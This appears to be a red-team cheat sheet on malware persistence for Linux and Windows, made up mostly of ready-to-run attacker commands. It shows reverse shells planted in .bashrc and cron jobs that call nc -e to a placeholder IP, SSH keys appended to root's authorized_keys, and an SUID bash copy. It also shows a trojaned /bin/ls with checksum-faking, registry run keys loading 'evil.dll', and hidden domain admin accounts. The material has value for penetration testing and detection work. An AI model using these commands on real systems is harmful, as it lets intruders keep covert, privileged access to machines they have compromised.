Skip to content

Malware persistence techniques

Linux

PDF - Linux Red Team Persistence Techniques

PDF - My Methods To Achieve Persistence In Linux Systems

PDF - Understanding Linux Malware

SSH Key

echo <public_key> >> /root/.ssh/authorized_keys
echo <public_key> >> /home/<user>/.ssh/authorized_keys

Add new account

useradd -m -s /bin/bash ftp
usermod -aG sudo ftp
passwd ftp

Shell configuration backdoor

  • .bashrc : Executed every time a user starts up a fresh terminal session in interactive mode.
  • .bash_profile : Executed every time a user logs into a system.

Example :

echo 'nc -e /bin/bash <IP> <PORT> 2>/dev/null &' >> ~/.bashrc

Exposed services backdoor

  • webshell

Cronjobs

$ crontab -e
* * * * * nc <IP> <PORT> -e /bin/sh
/etc/cron.hourly/
/etc/crontab
/etc/cron.daily/

Local privesc

cp /bin/bash /bin/sys
chmod u+s /bin/sys
/bin/sys -p

System services / boot scripts

systemd

[Service]
Type=simple
ExecStartPre=<PAYLOAD>
...

rc script

/etc/rc.d/rc.local
/etc/rc.conf
/etc/init.d/
/etc/rcX.d/
/etc/rc.local

X desktop autostart

  • ~/.config/autostart

File replacement / infection

ls backdoor :

$ mv /bin/ls /bin/ls2
$ cat ls
#!/bin/bash

PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/sbin

<BACKDOOR>
/bin/ls2 "$@"
$ chmod a+x ./ls
$ mv ./ls /bin/ls

md5sum, sha256sum, *sum backdoor that returns good hashes for backdoored binaries.

$ md5sum /bin/ls
b9dcdfcaea8082f5f5879086fdf7f2e2  /bin/ls
$ sha256sum /bin/ls
f48db5b77c6fddb35548fb86c6e279e5d18c55d2d4ff9adae66a2d582187e7c7  /bin/ls

Windows

MITRE ATT&CK - Persistence

Scheduled Task

at 12:00 cmd /c <PAYLOAD>

Startup folder

Placing a program within a startup folder will also cause that program to execute when a user logs in.

  • Current user : C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
  • All users : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

Registry keys

Adding an entry to the "run keys" in the Registry will cause the program referenced to be executed when a user logs in.

Registry run key entries can reference programs directly or list them as a dependency.

For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll"

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce

KEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx

The following Registry keys can be used to set startup folder items for persistence:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders

The following Registry keys can control automatic startup of services during boot:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices

Programs listed in the load value of the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows run when any user logs on.

Shortcut Modification

Create a malicious shortcut that look like a legitimate program.

Screensaver

  • https://pentestlab.blog/2019/10/09/persistence-screensaver/

PowerShell Profile

A profile is a Windows PowerShell ISE script that runs automatically when you start a new session.

Six different profiles :

  • Current User, Current Host – console : $Home\[My ]Documents\WindowsPowerShell\Profile.ps1
  • Current User, All Hosts : $Home\[My ]Documents\Profile.ps1
  • All Users, Current Host – console : $PsHome\Microsoft.PowerShell_profile.ps1
  • All Users, All Hosts : $PsHome\Profile.ps1
  • Current user, Current Host – ISE : $Home\[My ]Documents\WindowsPowerShell\Microsoft.P owerShellISE_profile.ps1
  • All users, Current Host – ISE : $PsHome\Microsoft.PowerShellISE_profile.ps1

DLL Hijacking

Service Hijacking

Create account

Local account :

net user /add <account_name> <account_password>
net user /delete <account_name>

Domain account :

net user /add <account_name> <account_password> /domain
net group "Domain Admins" <account_name> /add /domain

Software compoent

  • Webshell
  • SQL stored procedures
  • ...